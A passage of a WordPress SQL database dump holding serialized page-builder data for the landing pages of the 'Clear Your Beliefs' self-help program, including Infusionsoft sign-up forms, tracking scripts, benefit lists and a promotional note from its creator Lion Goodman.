src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1383, 1825, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:159:"\n[su_row]\n\n  [su_column size="4/5"]<iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe> [/su_column]\n[/su_row]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1113, 1598, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:696:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align:center;">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n</center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1111, 1597, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" 